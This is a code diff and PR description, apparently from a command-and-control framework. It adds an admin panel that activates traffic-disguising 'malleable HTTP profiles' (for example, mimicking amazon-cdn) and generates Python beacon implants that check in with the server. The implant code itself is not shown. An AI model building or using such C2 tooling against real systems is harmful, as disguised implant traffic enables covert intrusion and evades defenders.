+    const rows = data.profiles || [];
+    if (!rows.length) {
+      $("profList").innerHTML = '<div class="empty">No profiles</div>';
+      return;
+    }
+    let html = "<table><thead><tr><th>Name</th><th>Channel</th><th></th></tr></thead><tbody>";
+    rows.forEach((p) => {
+      const isAct = p.id === active || p.active;
+      html += `<tr>
+        <td><div>${escapeHtml(p.name)}</div>
+            <div class="muted mono" style="font-size:0.65rem">${escapeHtml(p.id)}${isAct ? " · ACTIVE" : ""}</div></td>
+        <td class="muted">${escapeHtml(p.channel || "http")}</td>
+        <td>${can("profiles:write") || can("admin")
+          ? `<button type="button" class="prof-act" data-id="${escapeHtml(p.id)}" style="padding:6px 8px;font-size:0.7rem">${isAct ? "Active" : "Activate"}</button>`
+          : ""}</td>
+      </tr>`;
+    });
+    html += "</tbody></table>";
+    $("profList").innerHTML = html;
+    $("profList").querySelectorAll(".prof-act").forEach((btn) => {
+      btn.onclick = async () => {
+        try {
+          await api("POST", `/api/v1/profiles/${btn.getAttribute("data-id")}/activate`);
+          showOk("Profile activated");
+          await loadProfiles();
+        } catch (e) { showError(String(e.message || e)); }
+      };
+    });
+  }
+  if ($("profReloadBtn")) {
+    $("profReloadBtn").onclick = () => loadProfiles().catch((e) => showError(String(e.message || e)));
+  }
+  if ($("profGenBtn")) {
+    $("profGenBtn").onclick = async () => {
+      try {
+        const host = location.hostname || "127.0.0.1";
+        const port = Number(location.port || 8443);
+        const res = await api("POST", "/api/v1/payloads/generate", {
+          template: "http_beacon_python",
+          host,
+          port,
+        });
+        setOut("profOut", res.content || JSON.stringify(res, null, 2), false);
+        showOk("Beacon generated for active profile");
+      } catch (e) { showError(String(e.message || e)); }
+    };
+  }
+
   // Bootstrap data for panels present
   if ($("featureToggles")) loadFeatures().catch((e) => showError(String(e.message || e)));
   if ($("tokList")) loadTokens().catch((e) => showError(String(e.message || e)));
+  if ($("profList")) loadProfiles().catch((e) => showError(String(e.message || e)));
   window.__SC5_ADMIN_LOADED__ = true;
 })();


### PR DESCRIPTION
## Summary
Makes malleable HTTP profiles **real** for authorized lab C2:

1. Activate profile (e.g. amazon-cdn)
2. Generate `http_beacon_python` with profile URI, UA, headers, body wrap, jitter, decoys
3. Implant check-in on custom URIs (\`/v1/telemetry\`, etc.) with wrapped bodies
4. Task poll + result on \`URI/result\`
5. Legacy \`/api/v1/implant/beacon\` still works
6. CLI: \`sc5 profiles list|active|activate\` and \`payloads generate --profile\`
7. Ops UI: C2 profiles panel

## Test plan
- [x] 110 tests pass including e2e profile check-in
- [x] ruff clean
- [ ] CI green
- [ ] After merge: GitHub Release + deploy binary to prod